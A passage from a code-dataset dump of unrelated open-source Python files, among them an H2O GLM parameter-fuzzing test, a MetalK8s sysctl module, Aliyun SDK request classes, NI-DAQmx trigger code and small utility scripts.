decompressor = brotli.Decompressor()
decompressed = decompressor.process(compressed) + decompressor.finish()
print(f"Decompressed data: {decompressed}")
if __name__ == "__main__":
main()
|
h2o-py/tests/testdir_algos/glm/pyunit_random_attack_medium.py | ahmedengu/h2o-3 | 6,098 | 12719087 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import print_function
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
import random
def random_attack():
def cointoss():
return random.randint(0, 1)
def attack(family, train, valid, x, y):
kwargs = {}
kwargs["family"] = family
gaussian_links = ["inverse", "log", "identity"]
binomial_links = ["logit"]
poisson_links = ["log", "identity"]
gamma_links = ["inverse", "log", "identity"]
# randomly select parameters and their corresponding values
if cointoss(): kwargs["max_iterations"] = random.randint(1, 50)
if random.random() > 0.8: kwargs["beta_epsilon"] = random.random()
if cointoss(): kwargs["solver"] = ["AUTO", "IRLSM", "L_BFGS", "COORDINATE_DESCENT_NAIVE",
"COORDINATE_DESCENT"][cointoss()]
if cointoss(): kwargs["standardize"] = [True, False][cointoss()]
if cointoss():
if family == "gaussian": kwargs["link"] = gaussian_links[random.randint(0, 2)]
elif family == "binomial": kwargs["link"] = binomial_links[0]
elif family == "poisson": kwargs["link"] = poisson_links[cointoss()]
elif family == "gamma": kwargs["link"] = gamma_links[random.randint(0, 2)]
if cointoss(): kwargs["alpha"] = [random.random()]
if family == "binomial":
if cointoss(): kwargs["prior"] = random.random()
if cointoss(): kwargs["lambda_search"] = [True, False][cointoss()]
if "lambda_search" in list(kwargs.keys()):
if cointoss(): kwargs["nlambdas"] = random.randint(2, 10)
do_validation = [True, False][cointoss()]
# beta constraints
if cointoss():
bc = []
for n in x:
if train[n].isnumeric()[0]:
name = train.names[n]
lower_bound = random.uniform(-1, 1)
upper_bound = lower_bound + random.random()
bc.append([name, lower_bound, upper_bound])
if len(bc) > 0:
beta_constraints = h2o.H2OFrame(bc)
beta_constraints.set_names(["names", "lower_bounds", "upper_bounds"])
kwargs["beta_constraints"] = beta_constraints
# display the parameters and their corresponding values
print("-----------------------")
print("x: {0}".format(x))
print("y: {0}".format(y))
print("validation: {0}".format(do_validation))
for k, v in kwargs.items():
if k == "beta_constraints":
print(k + ": ")
beta_constraints.show()
else:
print(k + ": {0}".format(v))
if do_validation:
# h2o.glm(x=train[x], y=train[y], validation_x=valid[x], validation_y=valid[y], **kwargs)
H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train, validation_frame=valid)
else:
# h2o.glm(x=train[x], y=train[y], **kwargs)
H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train)
print("-----------------------")
print("Import and data munging...")
seed = random.randint(1, 10000)
print("SEED: {0}".format(seed))
pros = h2o.upload_file(pyunit_utils.locate("smalldata/prostate/prostate.csv.zip"))
pros[1] = pros[1].asfactor()
r = pros[0].runif(seed=seed) # a column of length pros.nrow with values between 0 and 1
# ~80/20 train/validation split
pros_train = pros[r > .2]
pros_valid = pros[r <= .2]
cars = h2o.upload_file(pyunit_utils.locate("smalldata/junit/cars.csv"))
r = cars[0].runif(seed=seed)
cars_train = cars[r > .2]
cars_valid = cars[r <= .2]
print()
print("======================================================================")
print("============================== Binomial ==============================")
print("======================================================================")
for i in range(10):
attack("binomial", pros_train, pros_valid, random.sample([2, 3, 4, 5, 6, 7, 8], random.randint(1, 7)), 1)
print()
print("======================================================================")
print("============================== Gaussian ==============================")
print("======================================================================")
for i in range(10):
attack("gaussian", cars_train, cars_valid, random.sample([2, 3, 4, 5, 6, 7], random.randint(1, 6)), 1)
print()
print("======================================================================")
print("============================== Poisson ==============================")
print("======================================================================")
for i in range(10):
attack("poisson", cars_train, cars_valid, random.sample([1, 3, 4, 5, 6, 7], random.randint(1, 6)), 2)
print()
print("======================================================================")
print("============================== Gamma ==============================")
print("======================================================================")
for i in range(10):
attack("gamma", pros_train, pros_valid, random.sample([1, 2, 3, 5, 6, 7, 8], random.randint(1, 7)), 4)
if __name__ == "__main__":
pyunit_utils.standalone_test(random_attack)
else:
random_attack()
|
core/models/utils.py | zuimeiyujianni/MobileStyleGAN.pytorch | 540 | 12719092 | import torch
class NoiseManager:
def __init__(self, noise, device, trace_model=False):
self.device = device
self.noise_lut = {}
if noise is not None:
for i in range(len(noise)):
if not None in noise:
self.noise_lut[noise[i].size(-1)] = noise[i]
self.trace_model = trace_model
def __call__(self, size, b=1):
if self.trace_model:
return None if b == 1 else [None] * b
if size in self.noise_lut:
return self.noise_lut[size]
else:
return torch.randn(b, 1, size, size).to(self.device)
|
37_First_Neural_Style_Transfer/01_float32/03_weight_quantization.py | khanfarhan10/PINTO_model_zoo | 1,529 | 12719095 | ### tensorflow==2.2.0
import tensorflow as tf
# Weight Quantization - Input/Output=float32
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model_mosaic')
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS,tf.lite.OpsSet.SELECT_TF_OPS]
tflite_quant_model = converter.convert()
with open('mosaic_224_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - mosaic_224_weight_quant.tflite")
|
gen/tests/conftest.py | makkes/dcos | 2,577 | 12719099 | import os
import pytest
import dcos_installer.config_util
@pytest.fixture(autouse=True)
def mock_installer_latest_complete_artifact(monkeypatch):
monkeypatch.setattr(
dcos_installer.config_util,
'installer_latest_complete_artifact',
lambda _: {'bootstrap': os.getenv('BOOTSTRAP_ID', '12345'), 'packages': []},
)
|
dwitter/templatetags/to_gravatar_url.py | moonrisewarrior/dwitter | 714 | 12719104 | <reponame>moonrisewarrior/dwitter<filename>dwitter/templatetags/to_gravatar_url.py
import hashlib
from django import template
register = template.Library()
@register.filter
def to_gravatar_url(email):
return ('https://gravatar.com/avatar/%s?d=retro' %
hashlib.md5((email or '').strip().lower().encode('utf-8')).hexdigest())
|
shub/version.py | PyExplorer/shub | 111 | 12719152 | <filename>shub/version.py<gh_stars>100-1000
from __future__ import absolute_import
import click
import shub
@click.command(help="Show shub version")
def cli():
click.echo(shub.__version__)
|
aliyun-python-sdk-gdb/aliyunsdkgdb/request/v20190903/CreateDBInstanceRequest.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 12719161 | <filename>aliyun-python-sdk-gdb/aliyunsdkgdb/request/v20190903/CreateDBInstanceRequest.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkgdb.endpoint import endpoint_data
class CreateDBInstanceRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'gdb', '2019-09-03', 'CreateDBInstance','gds')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ClientToken(self):
return self.get_query_params().get('ClientToken')
def set_ClientToken(self,ClientToken):
self.add_query_param('ClientToken',ClientToken)
def get_DBInstanceCategory(self):
return self.get_query_params().get('DBInstanceCategory')
def set_DBInstanceCategory(self,DBInstanceCategory):
self.add_query_param('DBInstanceCategory',DBInstanceCategory)
def get_DBNodeStorageType(self):
return self.get_query_params().get('DBNodeStorageType')
def set_DBNodeStorageType(self,DBNodeStorageType):
self.add_query_param('DBNodeStorageType',DBNodeStorageType)
def get_DBInstanceDescription(self):
return self.get_query_params().get('DBInstanceDescription')
def set_DBInstanceDescription(self,DBInstanceDescription):
self.add_query_param('DBInstanceDescription',DBInstanceDescription)
def get_AutoRenewPeriod(self):
return self.get_query_params().get('AutoRenewPeriod')
def set_AutoRenewPeriod(self,AutoRenewPeriod):
self.add_query_param('AutoRenewPeriod',AutoRenewPeriod)
def get_Period(self):
return self.get_query_params().get('Period')
def set_Period(self,Period):
self.add_query_param('Period',Period)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_UsedTime(self):
return self.get_query_params().get('UsedTime')
def set_UsedTime(self,UsedTime):
self.add_query_param('UsedTime',UsedTime)
def get_DBInstanceClass(self):
return self.get_query_params().get('DBInstanceClass')
def set_DBInstanceClass(self,DBInstanceClass):
self.add_query_param('DBInstanceClass',DBInstanceClass)
def get_VSwitchId(self):
return self.get_query_params().get('VSwitchId')
def set_VSwitchId(self,VSwitchId):
self.add_query_param('VSwitchId',VSwitchId)
def get_SecurityIPList(self):
return self.get_query_params().get('SecurityIPList')
def set_SecurityIPList(self,SecurityIPList):
self.add_query_param('SecurityIPList',SecurityIPList)
def get_DBNodeStorage(self):
return self.get_query_params().get('DBNodeStorage')
def set_DBNodeStorage(self,DBNodeStorage):
self.add_query_param('DBNodeStorage',DBNodeStorage)
def get_DBInstanceNetworkType(self):
return self.get_query_params().get('DBInstanceNetworkType')
def set_DBInstanceNetworkType(self,DBInstanceNetworkType):
self.add_query_param('DBInstanceNetworkType',DBInstanceNetworkType)
def get_AutoRenew(self):
return self.get_query_params().get('AutoRenew')
def set_AutoRenew(self,AutoRenew):
self.add_query_param('AutoRenew',AutoRenew)
def get_DBInstanceVersion(self):
return self.get_query_params().get('DBInstanceVersion')
def set_DBInstanceVersion(self,DBInstanceVersion):
self.add_query_param('DBInstanceVersion',DBInstanceVersion)
def get_VPCId(self):
return self.get_query_params().get('VPCId')
def set_VPCId(self,VPCId):
self.add_query_param('VPCId',VPCId)
def get_ZoneId(self):
return self.get_query_params().get('ZoneId')
def set_ZoneId(self,ZoneId):
self.add_query_param('ZoneId',ZoneId)
def get_PayType(self):
return self.get_query_params().get('PayType')
def set_PayType(self,PayType):
self.add_query_param('PayType',PayType) |
scripts/readHeader.py | andrei-markeev/ts2c | 1,097 | 12719181 | #!/usr/bin/python
import sys
import CppHeaderParser
import json
import pprint
import re
cppHeader = CppHeaderParser.CppHeader(sys.argv[1])
#pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(cppHeader)
#sys.exit(0)
def convertType(type):
if type == "int":
return "number"
elif type == "const char *":
return "string"
elif type == "void":
return "void"
elif type[0:6] == "struct":
return re.sub(r'\s*\*\s*$','',type[7:])
else:
return ""
for func in cppHeader.functions:
params = []
for index, param in enumerate(func["parameters"]):
name = param["name"] or "p" + str(index + 1)
type = convertType(param["type"])
annotation = "" if type else "/** @ctype " + param["type"] + " */ "
params.append(annotation + name + (": " + type if type else ""))
name = func["name"]
type = convertType(func["rtnType"])
annotation = "" if type else "/** @ctype " + func["rtnType"] + " */\n"
func_s = "\n" + annotation + "function " + func["name"] + "(" + ", ".join(params) + ")" + (": " + type if type else "")
print("%s"%func_s) |
pyautogui__keyboard__examples/hotkey_change_state.py | DazEB2/SimplePyScripts | 117 | 12719245 | <reponame>DazEB2/SimplePyScripts
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
RUN_COMBINATION = 'Ctrl+Shift+R'
QUIT_COMBINATION = 'Ctrl+Shift+T'
AUTO_ATTACK_COMBINATION = 'Ctrl+Shift+Space'
BOT_DATA = {
'AUTO_ATTACK': False,
}
def change_auto_attack():
BOT_DATA['AUTO_ATTACK'] = not BOT_DATA['AUTO_ATTACK']
print('AUTO_ATTACK:', BOT_DATA['AUTO_ATTACK'])
print('Press "{}" for RUN'.format(RUN_COMBINATION))
print('Press "{}" for QUIT'.format(QUIT_COMBINATION))
print('Press "{}" for AUTO_ATTACK'.format(AUTO_ATTACK_COMBINATION))
import time
import os
import keyboard
keyboard.add_hotkey(QUIT_COMBINATION, lambda: print('Quit by Escape') or os._exit(0))
keyboard.add_hotkey(AUTO_ATTACK_COMBINATION, change_auto_attack)
keyboard.wait(RUN_COMBINATION)
print('Start')
i = 1
while True:
print(i, 'AUTO_ATTACK:', BOT_DATA['AUTO_ATTACK'])
time.sleep(1)
i += 1
|
salt/_modules/metalk8s_sysctl.py | SaintLoong/metalk8s | 255 | 12719263 | <reponame>SaintLoong/metalk8s
# -*- coding: utf-8 -*-
"""
Execution module to handle MetalK8s sysctl.
"""
import configparser
import pathlib
from salt.exceptions import CommandExecutionError
import salt.utils.files
__virtualname__ = "metalk8s_sysctl"
# Order in this list defines the precedence
SYSCTL_CFG_DIRECTORIES = [
"/run/sysctl.d",
"/etc/sysctl.d",
"/usr/local/lib/sysctl.d",
"/usr/lib/sysctl.d",
"/lib/sysctl.d",
]
# This file is applied last no matter what
SYSCTL_DEFAULT_CFG = "/etc/sysctl.conf"
def __virtual__():
return __virtualname__
def _get_sysctl_files(config):
"""
Return all the sysctl configuration files ordered as they are
read by the system.
Inject the configuration file passed in argument `config` in this
list, in case this file does not exist yet.
If the `config` file is not in an authorized path (see `SYSCTL_FILE_GLOBS`
and `SYSCTL_DEFAULT_CFG`) or is overwritten by a file with the same name
but higher precedence, it is ignored as the system will not take care
of it anyway.
"""
config_path = pathlib.Path(config).resolve()
files = {}
for directory in SYSCTL_CFG_DIRECTORIES:
path = pathlib.Path(directory)
if path == config_path.parent:
files.setdefault(config_path.name, str(config_path))
for cfg in path.glob("*.conf"):
files.setdefault(cfg.name, str(cfg))
sorted_files = [files[name] for name in sorted(files)]
sorted_files.append(SYSCTL_DEFAULT_CFG)
return sorted_files
def has_precedence(name, value, config, strict=False):
"""
Read all sysctl configuration file to check if the passed `name` and
`value` are not overwritten by an already existing sysctl configuration
file.
If `strict` is set, check that the final value comes from the passed
`config` and not another sysctl configuration file (even if the value is
equal to `value`).
"""
sysctl_files = _get_sysctl_files(config)
# Ignore files before the `config` one.
try:
sysctl_files = sysctl_files[sysctl_files.index(config) + 1 :]
except ValueError:
# If the file is not in the list, it means it's overwritten by an
# other sysctl configuration file with higher precedence.
config_name = pathlib.PurePath(config).name
for sysctl_file in sysctl_files:
sysctl_name = pathlib.PurePath(sysctl_file).name
if sysctl_name == config_name:
raise CommandExecutionError( # pylint: disable=raise-missing-from
"'{0}' has a higher precedence and overrides '{1}'".format(
sysctl_file, config
)
)
# The target file is not in a directory checked by the system
raise CommandExecutionError( # pylint: disable=raise-missing-from
"{0} is not a correct path for a sysctl configuration "
"file, please use one of the following:\n- {1}".format(
config, "\n- ".join(SYSCTL_CFG_DIRECTORIES)
)
)
parser = configparser.ConfigParser(interpolation=None)
epured_value = " ".join(str(value).split())
for sysctl_file in sysctl_files:
with salt.utils.files.fopen(sysctl_file, "r") as sysctl_fd:
parser.read_file(["[global]", *sysctl_fd], source=sysctl_file)
sysctl = dict(parser.items("global"))
parser.remove_section("global")
if name in sysctl and (
strict or " ".join(sysctl[name].split()) != epured_value
):
raise CommandExecutionError(
"'{0}' redefines '{1}' with value '{2}'".format(
sysctl_file, name, sysctl[name]
)
)
|
src/masonite/packages/Package.py | StevenMHernandez/masonite | 1,816 | 12719271 | <reponame>StevenMHernandez/masonite<filename>src/masonite/packages/Package.py
import os
class Package:
def __init__(self):
self.root_dir = ""
self.name = ""
self.config = ""
self.commands = []
self.views = []
self.migrations = []
self.controller_locations = []
self.routes = []
self.assets = []
def _build_path(self, rel_path):
return os.path.join(self.root_dir, rel_path)
def add_config(self, config_path):
self.config = self._build_path(config_path)
return self
def add_views(self, *locations):
for location in locations:
self.views.append(self._build_path(location))
return self
def add_migrations(self, *migrations):
for migration in migrations:
self.migrations.append(self._build_path(migration))
return self
def add_routes(self, *routes):
for route in routes:
self.routes.append(self._build_path(route))
return self
def add_assets(self, *assets):
for asset in assets:
self.assets.append(self._build_path(asset))
return self
def add_controller_locations(self, *controller_locations):
for loc in controller_locations:
self.controller_locations.append(self._build_path(loc))
return self
|
alipay/aop/api/response/AnttechBlockchainSignIndexCreateResponse.py | antopen/alipay-sdk-python-all | 213 | 12719279 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AnttechBlockchainSignIndexCreateResponse(AlipayResponse):
def __init__(self):
super(AnttechBlockchainSignIndexCreateResponse, self).__init__()
self._publish_success = None
@property
def publish_success(self):
return self._publish_success
@publish_success.setter
def publish_success(self, value):
self._publish_success = value
def parse_response_content(self, response_content):
response = super(AnttechBlockchainSignIndexCreateResponse, self).parse_response_content(response_content)
if 'publish_success' in response:
self.publish_success = response['publish_success']
|
src/tools/plot_episode.py | shahid313/embedding-propagation | 184 | 12719298 | <reponame>shahid313/embedding-propagation<filename>src/tools/plot_episode.py<gh_stars>100-1000
import pylab
def plot_episode(episode, classes_first=True):
sample_set = episode["support_set"].cpu()
query_set = episode["query_set"].cpu()
support_size = episode["support_size"]
query_size = episode["query_size"]
if not classes_first:
sample_set = sample_set.permute(1, 0, 2, 3, 4)
query_set = query_set.permute(1, 0, 2, 3, 4)
n, support_size, c, h, w = sample_set.size()
n, query_size, c, h, w = query_set.size()
sample_set = ((sample_set / 2 + 0.5) * 255).numpy().astype('uint8').transpose((0, 3, 1, 4, 2)).reshape((n *h, support_size * w, c))
pylab.imsave('support_set.png', sample_set)
query_set = ((query_set / 2 + 0.5) * 255).numpy().astype('uint8').transpose((0, 3, 1, 4, 2)).reshape((n *h, query_size * w, c))
pylab.imsave('query_set.png', query_set)
# pylab.imshow(query_set)
# pylab.title("query_set")
# pylab.show()
# pylab.savefig('query_set.png')
|
nidaqmx/_task_modules/triggers.py | stafak/nidaqmx-python | 252 | 12719326 | <reponame>stafak/nidaqmx-python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ctypes
import numpy
from nidaqmx._lib import lib_importer, wrapped_ndpointer, ctypes_byte_str
from nidaqmx.system.physical_channel import PhysicalChannel
from nidaqmx.errors import (
check_for_error, is_string_buffer_too_small, is_array_buffer_too_small)
from nidaqmx._task_modules.triggering.arm_start_trigger import ArmStartTrigger
from nidaqmx._task_modules.triggering.handshake_trigger import HandshakeTrigger
from nidaqmx._task_modules.triggering.pause_trigger import PauseTrigger
from nidaqmx._task_modules.triggering.reference_trigger import ReferenceTrigger
from nidaqmx._task_modules.triggering.start_trigger import StartTrigger
from nidaqmx.constants import (
SyncType)
class Triggers(object):
"""
Represents the trigger configurations for a DAQmx task.
"""
def __init__(self, task_handle):
self._handle = task_handle
self._arm_start_trigger = ArmStartTrigger(self._handle)
self._handshake_trigger = HandshakeTrigger(self._handle)
self._pause_trigger = PauseTrigger(self._handle)
self._reference_trigger = ReferenceTrigger(self._handle)
self._start_trigger = StartTrigger(self._handle)
@property
def arm_start_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.arm_start_trigger.ArmStartTrigger`:
Gets the arm start trigger configurations for the task.
"""
return self._arm_start_trigger
@property
def handshake_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.handshake_trigger.HandshakeTrigger`:
Gets the handshake trigger configurations for the task.
"""
return self._handshake_trigger
@property
def pause_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.pause_trigger.PauseTrigger`:
Gets the pause trigger configurations for the task.
"""
return self._pause_trigger
@property
def reference_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.reference_trigger.ReferenceTrigger`:
Gets the reference trigger configurations for the task.
"""
return self._reference_trigger
@property
def start_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.start_trigger.StartTrigger`:
Gets the start trigger configurations for the task.
"""
return self._start_trigger
@property
def sync_type(self):
"""
:class:`nidaqmx.constants.SyncType`: Specifies the role of the
device in a synchronized system. Setting this value to
**SyncType.MASTER** or **SyncType.SLAVE** enables trigger
skew correction. If you enable trigger skew correction, set
this property to **SyncType.MASTER** on only one device, and
set this property to **SyncType.SLAVE** on the other
devices.
"""
val = ctypes.c_int()
cfunc = lib_importer.windll.DAQmxGetTriggerSyncType
if cfunc.argtypes is None:
with cfunc.arglock:
if cfunc.argtypes is None:
cfunc.argtypes = [
lib_importer.task_handle, ctypes.POINTER(ctypes.c_int)]
error_code = cfunc(
self._handle, ctypes.byref(val))
check_for_error(error_code)
return SyncType(val.value)
@sync_type.setter
def sync_type(self, val):
val = val.value
cfunc = lib_importer.windll.DAQmxSetTriggerSyncType
if cfunc.argtypes is None:
with cfunc.arglock:
if cfunc.argtypes is None:
cfunc.argtypes = [
lib_importer.task_handle, ctypes.c_int]
error_code = cfunc(
self._handle, val)
check_for_error(error_code)
@sync_type.deleter
def sync_type(self):
cfunc = lib_importer.windll.DAQmxResetTriggerSyncType
if cfunc.argtypes is None:
with cfunc.arglock:
if cfunc.argtypes is None:
cfunc.argtypes = [
lib_importer.task_handle]
error_code = cfunc(
self._handle)
check_for_error(error_code)
|
opytimizer/optimizers/misc/__init__.py | anukaal/opytimizer | 528 | 12719338 | <gh_stars>100-1000
"""An evolutionary package for all common opytimizer modules.
It contains implementations of miscellaneous-based optimizers.
"""
from opytimizer.optimizers.misc.aoa import AOA
from opytimizer.optimizers.misc.cem import CEM
from opytimizer.optimizers.misc.doa import DOA
from opytimizer.optimizers.misc.gs import GS
from opytimizer.optimizers.misc.hc import HC
|
allennlp_models/lm/util/beam_search_generators/__init__.py | shunk031/allennlp-models | 402 | 12719344 | from .beam_search_generator import BeamSearchGenerator
from .transformer_beam_search_generator import TransformerBeamSearchGenerator
|
gs/monitor2/apps/plugins/layouts/status_layout.py | leozz37/makani | 1,178 | 12719355 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layout to monitor motors."""
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.plugins import common
from makani.gs.monitor2.apps.plugins.indicators import node_status
_WING_TMS570_NODES = common.WingTms570Nodes()
class StatusLayout(base.BaseLayout):
"""Layout to monitor motors."""
_NAME = 'Status'
_DESIRED_VIEW_COLS = 12
def Initialize(self):
self._AddIndicators('Network', [
node_status.TetherNodeNetworkIndicator(
node_name, node_name,
node_name not in common.NETWORK_STATUS_NODES_TO_EXCLUDE)
for node_name in _WING_TMS570_NODES
], {'cols': 3})
self._AddIndicators('Failures', [
node_status.TetherNodeFailureIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
self._AddIndicators('Power', [
node_status.TetherNodePowerIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
self._AddIndicators('Temperature [C]', [
node_status.TetherNodeTempIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
self._AddIndicators('Humidity', [
node_status.TetherNodeHumidityIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.